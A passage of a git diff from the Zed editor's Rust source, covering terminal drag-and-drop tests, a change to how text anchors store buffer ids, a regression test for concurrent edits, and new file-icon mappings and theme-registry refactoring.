worktree_id, + path: second_entry.path.clone(), + }), + is_dirty: false, + }); + let tab_item = + cx.new(|cx| TestItem::new(cx).with_project_items(&[tab_project_item])); + active_pane.update(cx, |pane, cx| { + pane.add_item(Box::new(tab_item.clone()), true, false, None, window, cx); + }); + + (active_pane, terminal, terminal_view, tab_item) + }) + .unwrap(); + + cx.run_until_parked(); + + window_handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspace().clone(); + let terminal_view_index = + active_pane.read(cx).index_for_item(&terminal_view).unwrap(); + let dragged_tab_index = active_pane.read(cx).index_for_item(&tab_item).unwrap(); + + assert!( + workspace.read(cx).pane_for(&terminal_view).is_some(), + "terminal view not registered with workspace after run_until_parked" + ); + + // Dragging an external file should write its path to the terminal + let external_paths = ExternalPaths(vec![first_path.clone()].into()); + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &external_paths, + &expected_drop_text(std::slice::from_ref(&first_path)), + window, + cx, + ); + + // Dragging a tab should write the path of the tab's item to the terminal + let dragged_tab = DraggedTab { + pane: active_pane.clone(), + item: Box::new(tab_item.clone()), + ix: dragged_tab_index, + detail: 0, + is_active: false, + }; + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &dragged_tab, + &expected_drop_text(std::slice::from_ref(&second_path)), + window, + cx, + ); + + // Dragging multiple selections should write both paths to the terminal + let dragged_selection = DraggedSelection { + active_selection: SelectedEntry { + worktree_id, + entry_id: first_entry.id, + }, + marked_selections: Arc::from([ + SelectedEntry { + worktree_id, + entry_id: first_entry.id, + }, + SelectedEntry { + worktree_id, + entry_id: second_entry.id, + }, + ]), + }; + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &dragged_selection, + &expected_drop_text(&[first_path.clone(), second_path.clone()]), + window, + cx, + ); + + // Dropping a project entry should write the entry's path to the terminal + let dropped_entry_id = first_entry.id; + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &dropped_entry_id, + &expected_drop_text(&[first_path]), + window, + cx, + ); + }) + .unwrap(); + } + // Terminal rename tests #[gpui::test] diff --git a/crates/text/Cargo.toml b/crates/text/Cargo.toml index ed02381eb83db5daececd159171a90072244a340..4dc186b374719bdf0112243160d09c14e0bc5970 100644 --- a/crates/text/Cargo.toml +++ b/crates/text/Cargo.toml @@ -35,5 +35,4 @@ ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } rand.workspace = true util = { workspace = true, features = ["test-support"] } -http_client = { workspace = true, features = ["test-support"] } zlog.workspace = true diff --git a/crates/text/src/anchor.rs b/crates/text/src/anchor.rs index 63e0570e91ef08dfce02fbbca25e97ee7519dc0a..4dbe0e377afb86d176e8cd336e186d209a9d3c78 100644 --- a/crates/text/src/anchor.rs +++ b/crates/text/src/anchor.rs @@ -15,8 +15,8 @@ pub struct Anchor { // we store the replica id and sequence number of the timestamp inline // to avoid the alignment of our fields from increasing the size of this struct // This saves 8 bytes, by allowing replica id, value and bias to occupy the padding - timestamp_replica_id: clock::ReplicaId, - timestamp_value: clock::Seq, + pub(crate) timestamp_replica_id: clock::ReplicaId, + pub(crate) timestamp_value: clock::Seq, /// The byte offset into the text inserted in the operation /// at `timestamp`. @@ -24,7 +24,7 @@ pub struct Anchor { /// Whether this anchor stays attached to the character *before* or *after* /// the offset. pub bias: Bias, - pub buffer_id: Option, + pub buffer_id: BufferId, } impl Debug for Anchor { @@ -46,28 +46,7 @@ impl Debug for Anchor { } impl Anchor { - pub const MIN: Self = Self { - timestamp_replica_id: clock::Lamport::MIN.replica_id, - timestamp_value: clock::Lamport::MIN.value, - offset: u32::MIN, - bias: Bias::Left, - buffer_id: None, - }; - - pub const MAX: Self = Self { - timestamp_replica_id: clock::Lamport::MAX.replica_id, - timestamp_value: clock::Lamport::MAX.value, - offset: u32::MAX, - bias: Bias::Right, - buffer_id: None, - }; - - pub fn new( - timestamp: clock::Lamport, - offset: u32, - bias: Bias, - buffer_id: Option, - ) -> Self { + pub fn new(timestamp: clock::Lamport, offset: u32, bias: Bias, buffer_id: BufferId) -> Self { Self { timestamp_replica_id: timestamp.replica_id, timestamp_value: timestamp.value, @@ -83,7 +62,7 @@ impl Anchor { timestamp_value: clock::Lamport::MIN.value, offset: u32::MIN, bias: Bias::Left, - buffer_id: Some(buffer_id), + buffer_id, } } @@ -93,7 +72,7 @@ impl Anchor { timestamp_value: clock::Lamport::MAX.value, offset: u32::MAX, bias: Bias::Right, - buffer_id: Some(buffer_id), + buffer_id, } } @@ -171,7 +150,7 @@ impl Anchor { pub fn is_valid(&self, buffer: &BufferSnapshot) -> bool { if self.is_min() || self.is_max() { true - } else if self.buffer_id.is_none_or(|id| id != buffer.remote_id) { + } else if self.buffer_id != buffer.remote_id { false } else { let Some(fragment_id) = buffer.try_fragment_id_for_anchor(self) else { @@ -207,6 +186,18 @@ impl Anchor { value: self.timestamp_value, } } + + pub fn opaque_id(&self) -> [u8; 20] { + let mut bytes = [0u8; 20]; + let buffer_id: u64 = self.buffer_id.into(); + bytes[0..8].copy_from_slice(&buffer_id.to_le_bytes()); + bytes[8..12].copy_from_slice(&self.offset.to_le_bytes()); + bytes[12..16].copy_from_slice(&self.timestamp_value.to_le_bytes()); + let replica_id = self.timestamp_replica_id.as_u16(); + bytes[16..18].copy_from_slice(&replica_id.to_le_bytes()); + bytes[18] = self.bias as u8; + bytes + } } pub trait OffsetRangeExt { @@ -237,6 +228,7 @@ where pub trait AnchorRangeExt { fn cmp(&self, b: &Range, buffer: &BufferSnapshot) -> Ordering; fn overlaps(&self, b: &Range, buffer: &BufferSnapshot) -> bool; + fn contains_anchor(&self, b: Anchor, buffer: &BufferSnapshot) -> bool; } impl AnchorRangeExt for Range { @@ -250,4 +242,8 @@ impl AnchorRangeExt for Range { fn overlaps(&self, other: &Range, buffer: &BufferSnapshot) -> bool { self.start.cmp(&other.end, buffer).is_lt() && other.start.cmp(&self.end, buffer).is_lt() } + + fn contains_anchor(&self, other: Anchor, buffer: &BufferSnapshot) -> bool { + self.start.cmp(&other, buffer).is_le() && self.end.cmp(&other, buffer).is_ge() + } } diff --git a/crates/text/src/patch.rs b/crates/text/src/patch.rs index eff3d0af110763074d7ca9fdc7842d45eece03c1..376d284473d09df16b93a609c8d49c443aa8a4ab 100644 --- a/crates/text/src/patch.rs +++ b/crates/text/src/patch.rs @@ -56,7 +56,10 @@ where if edit.is_empty() { return; } + self.push_maybe_empty(edit); + } + pub fn push_maybe_empty(&mut self, edit: Edit) { if let Some(last) = self.0.last_mut() { if last.old.end >= edit.old.start { last.old.end = edit.old.end; diff --git a/crates/text/src/tests.rs b/crates/text/src/tests.rs index 194ac2a40d5ac96a39177eedd35b991ded30de38..e6e7534cb283ddc7bac61209537c26be657bd8f8 100644 --- a/crates/text/src/tests.rs +++ b/crates/text/src/tests.rs @@ -30,6 +30,24 @@ fn test_edit() { assert_eq!(buffer.text(), "ghiamnoef"); } +#[test] +fn test_point_for_row_and_column_from_external_source() { + let buffer = Buffer::new( + ReplicaId::LOCAL, + BufferId::new(1).unwrap(), + "aéøbcdef\nsecond", + ); + let snapshot = buffer.snapshot(); + + assert_eq!(snapshot.point_from_external_input(0, 0), Point::new(0, 0)); + assert_eq!(snapshot.point_from_external_input(0, 4), Point::new(0, 6)); + assert_eq!( + snapshot.point_from_external_input(0, 100), + Point::new(0, 10) + ); + assert_eq!(snapshot.point_from_external_input(1, 3), Point::new(1, 3)); +} + #[gpui::test(iterations = 100)] fn test_random_edits(mut rng: StdRng) { let operations = env::var("OPERATIONS") @@ -731,6 +749,48 @@ fn test_concurrent_edits() { assert_eq!(buffer3.text(), "a12c34e56"); } +// Regression test: applying a remote edit whose FullOffset range partially +// overlaps a fragment that was already deleted (observed but not visible) +// used to leave the fragment unsplit, causing the rope builder to read past +// the end of the rope. +#[test] +fn test_edit_partially_intersecting_a_deleted_fragment() { + let mut buffer = Buffer::new(ReplicaId::new(1), BufferId::new(1).unwrap(), "abcdefgh"); + + // Delete "cde", creating a single deleted fragment at FullOffset 2..5. + // After this the fragment layout is: + // "ab"(vis, FullOffset 0..2) "cde"(del, 2..5) "fgh"(vis, 5..8) + buffer.edit([(2..5, "")]); + assert_eq!(buffer.text(), "abfgh"); + + // Construct a synthetic remote edit whose version includes the deletion (so + // the "cde" fragment is observed + deleted → !was_visible) but whose + // FullOffset range only partially overlaps it. This state arises in + // production when concurrent edits cause different fragment splits on + // different replicas. + let synthetic_timestamp = clock::Lamport { + replica_id: ReplicaId::new(2), + value: 10, + }; + let synthetic_edit = Operation::Edit(EditOperation { + timestamp: synthetic_timestamp, + version: buffer.version(), + // Range 1..4 partially overlaps the deleted "cde" (FullOffset 2..5): + // it covers "b" (1..2) and only "cd" (2..4), leaving "e" (4..5) out. + ranges: vec![FullOffset(1)..FullOffset(4)], + new_text: vec!["".into()], + }); + + // Without the fix this panics with "cannot summarize past end of rope" + // because the full 3-byte "cde" fragment is consumed from the deleted + // rope instead of only the 2-byte intersection. + buffer.apply_ops([synthetic_edit]); + assert_eq!(buffer.text(), "afgh"); + + buffer.undo_operations([(synthetic_timestamp, u32::MAX)].into_iter().collect()); + assert_eq!(buffer.text(), "abfgh"); +} + #[gpui::test(iterations = 100)] fn test_random_concurrent_edits(mut rng: StdRng) { let peers = env::var("PEERS") diff --git a/crates/text/src/text.rs b/crates/text/src/text.rs index a5bdbe443bbaa4723c8d3104bfed28e4c2fe8fdb..026f1272790740c9c2277004e8e96800d87bab15 100644 --- a/crates/text/src/text.rs +++ b/crates/text/src/text.rs @@ -223,10 +223,11 @@ impl History { redo_stack: Vec::new(), transaction_depth: 0, // Don't group transactions in tests unless we opt in, because it's a footgun. - #[cfg(any(test, feature = "test-support"))] - group_interval: Duration::ZERO, - #[cfg(not(any(test, feature = "test-support")))] - group_interval: Duration::from_millis(300), + group_interval: if cfg!(any(test, feature = "test-support")) { + Duration::ZERO + } else { + Duration::from_millis(300) + }, } } @@ -1234,15 +1235,18 @@ impl Buffer { let fragment_end = old_fragments.end().0.full_offset(); let mut intersection = fragment.clone(); let intersection_end = cmp::min(range.end, fragment_end); - if fragment.was_visible(version, &self.undo_map) { + if version.observed(fragment.timestamp) { intersection.len = (intersection_end.0 - fragment_start.0) as u32; intersection.insertion_offset += (fragment_start - old_fragments.start().0.full_offset()) as u32; intersection.id = Locator::between(&new_fragments.summary().max_id, &intersection.id); - intersection.deletions.push(timestamp); - intersection.visible = false; - insertion_slices.push(InsertionSlice::from_fragment(timestamp, &intersection)); + if fragment.was_visible(version, &self.undo_map) { + intersection.deletions.push(timestamp); + intersection.visible = false; + insertion_slices + .push(InsertionSlice::from_fragment(timestamp, &intersection)); + } } if intersection.len > 0 { if fragment.visible && !intersection.visible { @@ -1822,6 +1826,10 @@ impl Buffer { tx.try_send(()).ok(); } } + + pub fn set_group_interval(&mut self, group_interval: Duration) { + self.history.group_interval = group_interval; + } } #[cfg(any(test, feature = "test-support"))] @@ -1926,10 +1934,6 @@ impl Buffer { assert!(!self.text().contains("\r\n")); } - pub fn set_group_interval(&mut self, group_interval: Duration) { - self.history.group_interval = group_interval; - } - pub fn random_byte_range(&self, start_offset: usize, rng: &mut impl rand::Rng) -> Range { let end = self.clip_offset(rng.random_range(start_offset..=self.len()), Bias::Right); let start = self.clip_offset(rng.random_range(start_offset..=end), Bias::Right); @@ -2254,6 +2258,37 @@ impl BufferSnapshot { (row_end_offset - row_start_offset) as u32 } + /// A function to convert character offsets from e.g. user's `go.mod:22:33` input into byte-offset Point columns. + pub fn point_from_external_input(&self, row: u32, characters: u32) -> Point { + const MAX_BYTES_IN_UTF_8: u32 = 4; + + let row = row.min(self.max_point().row); + let start = Point::new(row, 0); + let end = self.clip_point( + Point::new( + row, + characters + .saturating_mul(MAX_BYTES_IN_UTF_8) + .saturating_add(1), + ), + Bias::Right, + ); + let range = start..end; + let mut point = range.start; + let mut remaining_columns = characters; + + for chunk in self.text_for_range(range) { + for character in chunk.chars() { + if remaining_columns == 0 { + return point; + } + remaining_columns -= 1; + point.column += character.len_utf8() as u32; + } + } + point + } + pub fn line_indents_in_row_range( &self, row_range: Range, @@ -2342,7 +2377,7 @@ impl BufferSnapshot { pub fn summaries_for_anchors<'a, D, A>(&'a self, anchors: A) -> impl 'a + Iterator where D: 'a + TextDimension, - A: 'a + IntoIterator, + A: 'a + IntoIterator, { let anchors = anchors.into_iter(); self.summaries_for_anchors_with_payload::(anchors.map(|a| (a, ()))) @@ -2355,7 +2390,7 @@ impl BufferSnapshot { ) -> impl 'a + Iterator where D: 'a + TextDimension, - A: 'a + IntoIterator, + A: 'a + IntoIterator, { let anchors = anchors.into_iter(); let mut fragment_cursor = self @@ -2371,7 +2406,7 @@ impl BufferSnapshot { return (D::from_text_summary(&self.visible_text.summary()), payload); } - let Some(insertion) = self.try_find_fragment(anchor) else { + let Some(insertion) = self.try_find_fragment(&anchor) else { panic!( "invalid insertion for buffer {}@{:?} with anchor {:?}", self.remote_id(), @@ -2379,13 +2414,22 @@ impl BufferSnapshot { anchor ); }; + // TODO verbose debug because we are seeing is_max return false unexpectedly, + // remove this once that is understood and fixed assert_eq!( insertion.timestamp, anchor.timestamp(), - "invalid insertion for buffer {}@{:?} and anchor {:?}", + "invalid insertion for buffer {}@{:?}. anchor: {:?}, {:?}, {:?}, {:?}, {:?}. timestamp: {:?}, offset: {:?}, bias: {:?}", self.remote_id(), self.version, - anchor + anchor.timestamp_replica_id, + anchor.timestamp_value, + anchor.offset, + anchor.bias, + anchor.buffer_id, + anchor.timestamp() == clock::Lamport::MAX, + anchor.offset == u32::MAX, + anchor.bias == Bias::Right, ); fragment_cursor.seek_forward(&Some(&insertion.fragment_id), Bias::Left); @@ -2413,7 +2457,7 @@ impl BufferSnapshot { } else if anchor.is_max() { self.visible_text.len() } else { - debug_assert_eq!(anchor.buffer_id, Some(self.remote_id)); + debug_assert_eq!(anchor.buffer_id, self.remote_id); debug_assert!( self.version.observed(anchor.timestamp()), "Anchor timestamp {:?} not observed by buffer {:?}", @@ -2445,7 +2489,7 @@ impl BufferSnapshot { #[cold] fn panic_bad_anchor(&self, anchor: &Anchor) -> ! { - if anchor.buffer_id.is_some_and(|id| id != self.remote_id) { + if anchor.buffer_id != self.remote_id { panic!( "invalid anchor - buffer id does not match: anchor {anchor:?}; buffer id: {}, version: {:?}", self.remote_id, self.version @@ -2509,12 +2553,12 @@ impl BufferSnapshot { } /// Returns an anchor range for the given input position range that is anchored to the text in the range. - pub fn anchor_range_around(&self, position: Range) -> Range { + pub fn anchor_range_inside(&self, position: Range) -> Range { self.anchor_after(position.start)..self.anchor_before(position.end) } /// Returns an anchor range for the given input position range that is anchored to the text before and after. - pub fn anchor_range_between(&self, position: Range) -> Range { + pub fn anchor_range_outside(&self, position: Range) -> Range { self.anchor_before(position.start)..self.anchor_after(position.end) } @@ -2564,7 +2608,7 @@ impl BufferSnapshot { fragment.timestamp, fragment.insertion_offset + overshoot as u32, bias, - Some(self.remote_id), + self.remote_id, ) } } @@ -2572,8 +2616,7 @@ impl BufferSnapshot { pub fn can_resolve(&self, anchor: &Anchor) -> bool { anchor.is_min() || anchor.is_max() - || (Some(self.remote_id) == anchor.buffer_id - && self.version.observed(anchor.timestamp())) + || (self.remote_id == anchor.buffer_id && self.version.observed(anchor.timestamp())) } pub fn clip_offset(&self, offset: usize, bias: Bias) -> usize { @@ -2599,7 +2642,10 @@ impl BufferSnapshot { where D: TextDimension + Ord, { - self.edits_since_in_range(since, Anchor::MIN..Anchor::MAX) + self.edits_since_in_range( + since, + Anchor::min_for_buffer(self.remote_id)..Anchor::max_for_buffer(self.remote_id), + ) } pub fn anchored_edits_since<'a, D>( @@ -2609,7 +2655,10 @@ impl BufferSnapshot { where D: TextDimension + Ord, { - self.anchored_edits_since_in_range(since, Anchor::MIN..Anchor::MAX) + self.anchored_edits_since_in_range( + since, + Anchor::min_for_buffer(self.remote_id)..Anchor::max_for_buffer(self.remote_id), + ) } pub fn edits_since_in_range<'a, D>( @@ -2872,13 +2921,13 @@ impl bool> Iterator for Ed fragment.timestamp, fragment.insertion_offset, Bias::Right, - Some(self.buffer_id), + self.buffer_id, ); let end_anchor = Anchor::new( fragment.timestamp, fragment.insertion_offset + fragment.len, Bias::Left, - Some(self.buffer_id), + self.buffer_id, ); if !fragment.was_visible(self.since, self.undos) && fragment.visible { diff --git a/crates/theme/Cargo.toml b/crates/theme/Cargo.toml index ef193c500d461201e8746ad3ec0f33b01e423b18..5bb624dd0c101aa978e296a7ff33c02b2faa99c1 100644 --- a/crates/theme/Cargo.toml +++ b/crates/theme/Cargo.toml @@ -10,7 +10,7 @@ workspace = true [features] default = [] -test-support = ["gpui/test-support", "fs/test-support", "settings/test-support"] +test-support = ["gpui/test-support", "syntax_theme/test-support"] [lib] path = "src/theme.rs" @@ -20,10 +20,8 @@ doctest = false anyhow.workspace = true collections.workspace = true derive_more.workspace = true -fs.workspace = true -futures.workspace = true gpui.workspace = true -log.workspace = true +syntax_theme.workspace = true palette = { workspace = true, default-features = false, features = ["std"] } parking_lot.workspace = true refineable.workspace = true @@ -31,13 +29,9 @@ schemars = { workspace = true, features = ["indexmap2"] } serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true -settings.workspace = true strum.workspace = true thiserror.workspace = true -util.workspace = true uuid.workspace = true [dev-dependencies] -fs = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -settings = { workspace = true, features = ["test-support"] } diff --git a/crates/theme/src/fallback_themes.rs b/crates/theme/src/fallback_themes.rs index 72b65f85c9ecb2776fc6066c8b926cfa4bd42929..a739df3213d297ce8230cfb62a08c91928bd62df 100644 --- a/crates/theme/src/fallback_themes.rs +++ b/crates/theme/src/fallback_themes.rs @@ -25,7 +25,8 @@ pub fn zed_default_themes() -> ThemeFamily { // If a theme customizes a foreground version of a status color, but does not // customize the background color, then use a partly-transparent version of the // foreground color for the background color. -pub(crate) fn apply_status_color_defaults(status: &mut StatusColorsRefinement) { +/// Applies default status color backgrounds from their foreground counterparts. +pub fn apply_status_color_defaults(status: &mut StatusColorsRefinement) { for (fg_color, bg_color) in [ (&status.deleted, &mut status.deleted_background), (&status.created, &mut status.created_background), @@ -42,7 +43,8 @@ pub(crate) fn apply_status_color_defaults(status: &mut StatusColorsRefinement) { } } -pub(crate) fn apply_theme_color_defaults( +/// Applies default theme color values derived from player colors. +pub fn apply_theme_color_defaults( theme_colors: &mut ThemeColorsRefinement, player_colors: &PlayerColors, ) { @@ -314,70 +316,70 @@ pub(crate) fn zed_default_dark() -> Theme { warning_border: yellow, }, player, - syntax: Arc::new(SyntaxTheme { - highlights: vec![ - ("attribute".into(), purple.into()), - ("boolean".into(), orange.into()), - ("comment".into(), gray.into()), - ("comment.doc".into(), gray.into()), - ("constant".into(), yellow.into()), - ("constructor".into(), blue.into()), - ("embedded".into(), HighlightStyle::default()), - ( - "emphasis".into(), - HighlightStyle { - font_style: Some(FontStyle::Italic), - ..HighlightStyle::default() - }, - ), - ( - "emphasis.strong".into(), - HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..HighlightStyle::default() - }, - ), - ("enum".into(), teal.into()), - ("function".into(), blue.into()), - ("function.method".into(), blue.into()), - ("function.definition".into(), blue.into()), - ("hint".into(), blue.into()), - ("keyword".into(), purple.into()), - ("label".into(), HighlightStyle::default()), - ("link_text".into(), blue.into()), - ( - "link_uri".into(), - HighlightStyle { - color: Some(teal), - font_style: Some(FontStyle::Italic), - ..HighlightStyle::default() - }, - ), - ("number".into(), orange.into()), - ("operator".into(), HighlightStyle::default()), - ("predictive".into(), HighlightStyle::default()), - ("preproc".into(), HighlightStyle::default()), - ("primary".into(), HighlightStyle::default()), - ("property".into(), red.into()), - ("punctuation".into(), HighlightStyle::default()), - ("punctuation.bracket".into(), HighlightStyle::default()), - ("punctuation.delimiter".into(), HighlightStyle::default()), - ("punctuation.list_marker".into(), HighlightStyle::default()), - ("punctuation.special".into(), HighlightStyle::default()), - ("string".into(), green.into()), - ("string.escape".into(), HighlightStyle::default()), - ("string.regex".into(), red.into()), - ("string.special".into(), HighlightStyle::default()), - ("string.special.symbol".into(), HighlightStyle::default()), - ("tag".into(), HighlightStyle::default()), - ("text.literal".into(), HighlightStyle::default()), - ("title".into(), HighlightStyle::default()), - ("type".into(), teal.into()), - ("variable".into(), HighlightStyle::default()), - ("variable.special".into(), red.into()), - ("variant".into(), HighlightStyle::default()), - ], - }), + syntax: Arc::new(SyntaxTheme::new(vec![ + ("attribute".into(), purple.into()), + ("boolean".into(), orange.into()), + ("comment".into(), gray.into()), + ("comment.doc".into(), gray.into()), + ("constant".into(), yellow.into()), + ("constructor".into(), blue.into()), + ("embedded".into(), HighlightStyle::default()), + ( + "emphasis".into(), + HighlightStyle { + font_style: Some(FontStyle::Italic), + ..HighlightStyle::default() + }, + ), + ( + "emphasis.strong".into(), + HighlightStyle { + font_weight: Some(FontWeight::BOLD), + ..HighlightStyle::default() + }, + ), + ("enum".into(), teal.into()), + ("function".into(), blue.into()), + ("function.method".into(), blue.into()), + ("function.definition".into(), blue.into()), + ("hint".into(), blue.into()), + ("keyword".into(), purple.into()), + ("label".into(), HighlightStyle::default()), + ("link_text".into(), blue.into()), + ( + "link_uri".into(), + HighlightStyle { + color: Some(teal), + font_style: Some(FontStyle::Italic), + ..HighlightStyle::default() + }, + ), + ("number".into(), orange.into()), + ("operator".into(), HighlightStyle::default()), + ("predictive".into(), HighlightStyle::default()), + ("preproc".into(), purple.into()), + ("primary".into(), HighlightStyle::default()), + ("property".into(), red.into()), + ("punctuation".into(), HighlightStyle::default()), + ("punctuation.bracket".into(), HighlightStyle::default()), + ("punctuation.delimiter".into(), HighlightStyle::default()), + ("punctuation.list_marker".into(), HighlightStyle::default()), + ("punctuation.special".into(), HighlightStyle::default()), + ("string".into(), green.into()), + ("string.escape".into(), HighlightStyle::default()), + ("string.regex".into(), red.into()), + ("string.special".into(), HighlightStyle::default()), + ("string.special.symbol".into(), HighlightStyle::default()), + ("tag".into(), HighlightStyle::default()), + ("text.literal".into(), HighlightStyle::default()), + ("title".into(), HighlightStyle::default()), + ("type".into(), teal.into()), + ("variable".into(), HighlightStyle::default()), + ("variable.special".into(), red.into()), + ("variant".into(), HighlightStyle::default()), + ("diff.plus".into(), green.into()), + ("diff.minus".into(), red.into()), + ])), }, } } diff --git a/crates/theme/src/icon_theme.rs b/crates/theme/src/icon_theme.rs index 8415462595cb93a19365a929660b4e8e3f78f8d8..314978218194895d802028be19a7b3bdb454bf9c 100644 --- a/crates/theme/src/icon_theme.rs +++ b/crates/theme/src/icon_theme.rs @@ -66,7 +66,7 @@ pub struct IconDefinition { } const FILE_STEMS_BY_ICON_KEY: &[(&str, &[&str])] = &[ - ("docker", &["Dockerfile"]), + ("docker", &["Containerfile", "Dockerfile"]), ("ruby", &["Podfile"]), ("heroku", &["Procfile"]), ]; @@ -89,7 +89,7 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ( "cpp", &[ - "c++", "h++", "cc", "cpp", "cxx", "hh", "hpp", "hxx", "inl", "ixx", + "c++", "h++", "cc", "cpp", "cppm", "cxx", "hh", "hpp", "hxx", "inl", "ixx", ], ), ("crystal", &["cr", "ecr"]), @@ -99,6 +99,15 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("cue", &["cue"]), ("dart", &["dart"]), ("diff", &["diff"]), + ( + "docker", + &[ + "docker-compose.yml", + "docker-compose.yaml", + "compose.yml", + "compose.yaml", + ], + ), ( "document", &[ @@ -106,7 +115,8 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ "xlsx", ], ), - ("elixir", &["eex", "ex", "exs", "heex"]), + ("editorconfig", &["editorconfig"]), + ("elixir", &["eex", "ex", "exs", "heex", "leex", "neex"]), ("elm", &["elm"]), ( "erlang", @@ -138,12 +148,27 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("font", &["otf", "ttf", "woff", "woff2"]), ("fsharp", &["fs"]), ("fsproj", &["fsproj"]), - ("gitlab", &["gitlab-ci.yml"]), + ("gitlab", &["gitlab-ci.yml", "gitlab-ci.yaml"]), ("gleam", &["gleam"]), ("go", &["go", "mod", "work"]), ("graphql", &["gql", "graphql", "graphqls"]), ("haskell", &["hs"]), ("hcl", &["hcl"]), + ( + "helm", + &[ + "helmfile.yaml", + "helmfile.yml", + "Chart.yaml", + "Chart.yml", + "Chart.lock", + "values.yaml", + "values.yml", + "requirements.yaml", + "requirements.yml", + "tpl", + ], + ), ("html", &["htm", "html"]), ( "image", @@ -198,7 +223,7 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("rust", &["rs"]), ("sass", &["sass", "scss"]), ("scala", &["scala", "sc"]), - ("settings", &["conf", "ini", "yaml", "yml"]), + ("settings", &["conf", "ini"]), ("solidity", &["sol"]), ( "storage", @@ -279,6 +304,7 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("vue", &["vue"]), ("vyper", &["vy", "vyi"]), ("wgsl", &["wgsl"]), + ("yaml", &["yaml", "yml"]), ("zig", &["zig"]), ]; @@ -303,6 +329,7 @@ const FILE_ICONS: &[(&str, &str)] = &[ ("diff", "icons/file_icons/diff.svg"), ("docker", "icons/file_icons/docker.svg"), ("document", "icons/file_icons/book.svg"), + ("editorconfig", "icons/file_icons/editorconfig.svg"), ("elixir", "icons/file_icons/elixir.svg"), ("elm", "icons/file_icons/elm.svg"), ("erlang", "icons/file_icons/erlang.svg"), @@ -310,12 +337,13 @@ const FILE_ICONS: &[(&str, &str)] = &[ ("font", "icons/file_icons/font.svg"), ("fsharp", "icons/file_icons/fsharp.svg"), ("fsproj", "icons/file_icons/file.svg"), - ("gitlab", "icons/file_icons/settings.svg"), + ("gitlab", "icons/file_icons/gitlab.svg"), ("gleam", "icons/file_icons/gleam.svg"), ("go", "icons/file_icons/go.svg"), ("graphql", "icons/file_icons/graphql.svg"), ("haskell", "icons/file_icons/haskell.svg"), ("hcl", "icons/file_icons/hcl.svg"), + ("helm", "icons/file_icons/helm.svg"), ("heroku", "icons/file_icons/heroku.svg"), ("html", "icons/file_icons/html.svg"), ("image", "icons/file_icons/image.svg"), @@ -371,6 +399,7 @@ const FILE_ICONS: &[(&str, &str)] = &[ ("vue", "icons/file_icons/vue.svg"), ("vyper", "icons/file_icons/vyper.svg"), ("wgsl", "icons/file_icons/wgsl.svg"), + ("yaml", "icons/file_icons/yaml.svg"), ("zig", "icons/file_icons/zig.svg"), ]; @@ -389,7 +418,7 @@ fn icon_keys_by_association( } /// The name of the default icon theme. -pub(crate) const DEFAULT_ICON_THEME_NAME: &str = "Zed (Default)"; +pub const DEFAULT_ICON_THEME_NAME: &str = "Zed (Default)"; static DEFAULT_ICON_THEME: LazyLock> = LazyLock::new(|| { Arc::new(IconTheme { diff --git a/crates/theme/src/registry.rs b/crates/theme/src/registry.rs index c362b62704257fefde125e81ca1c056490263b0b..fbe535309773fa5c90c2031d44b420cf5fad2dc7 100644 --- a/crates/theme/src/registry.rs +++ b/crates/theme/src/registry.rs @@ -1,20 +1,16 @@ use std::sync::Arc; use std::{fmt::Debug, path::Path}; -use anyhow::{Context as _, Result}; +use anyhow::Result; use collections::HashMap; use derive_more::{Deref, DerefMut}; -use fs::Fs; -use futures::StreamExt; use gpui::{App, AssetSource, Global, SharedString}; use parking_lot::RwLock; use thiserror::Error; -use util::ResultExt; use crate::{ Appearance, AppearanceContent, ChevronIcons, DEFAULT_ICON_THEME_NAME, DirectoryIcons, - IconDefinition, IconTheme, Theme, ThemeFamily, ThemeFamilyContent, default_icon_theme, - read_icon_theme, read_user_theme, refine_theme_family, + IconDefinition, IconTheme, IconThemeFamilyContent, Theme, ThemeFamily, default_icon_theme, }; /// The metadata for a theme. @@ -83,6 +79,11 @@ impl ThemeRegistry { cx.set_global(GlobalThemeRegistry(Arc::new(ThemeRegistry::new(assets)))); } + /// Returns the asset source used by this registry. + pub fn assets(&self) -> &dyn AssetSource { + self.assets.as_ref() + } + /// Creates a new [`ThemeRegistry`] with the given [`AssetSource`]. pub fn new(assets: Box) -> Self { let registry = Self { @@ -118,28 +119,21 @@ impl ThemeRegistry { self.state.write().extensions_loaded = true; } - fn insert_theme_families(&self, families: impl IntoIterator) { + /// Inserts the given theme families into the registry. + pub fn insert_theme_families(&self, families: impl IntoIterator) { for family in families.into_iter() { self.insert_themes(family.themes); } } - fn insert_themes(&self, themes: impl IntoIterator) { + /// Inserts the given themes into the registry. + pub fn insert_themes(&self, themes: impl IntoIterator) { let mut state = self.state.write(); for theme in themes.into_iter() { state.themes.insert(theme.name.clone(), Arc::new(theme)); } } - #[allow(unused)] - fn insert_user_theme_families(&self, families: impl IntoIterator) { - for family in families.into_iter() { - let refined_family = refine_theme_family(family); - - self.insert_themes(refined_family.themes); - } - } - /// Removes the themes with the given names from the registry. pub fn remove_user_themes(&self, themes_to_remove: &[SharedString]) { self.state @@ -183,60 +177,6 @@ impl ThemeRegistry { .cloned() } - /// Loads the themes bundled with the Zed binary and adds them to the registry. - pub fn load_bundled_themes(&self) { - let theme_paths = self - .assets - .list("themes/") - .expect("failed to list theme assets") - .into_iter() - .filter(|path| path.ends_with(".json")); - - for path in theme_paths { - let Some(theme) = self.assets.load(&path).log_err().flatten() else { - continue; - }; - - let Some(theme_family) = serde_json::from_slice(&theme) - .with_context(|| format!("failed to parse theme at path \"{path}\"")) - .log_err() - else { - continue; - }; - - self.insert_user_theme_families([theme_family]); - } - } - - /// Loads the user themes from the specified directory and adds them to the registry. - pub async fn 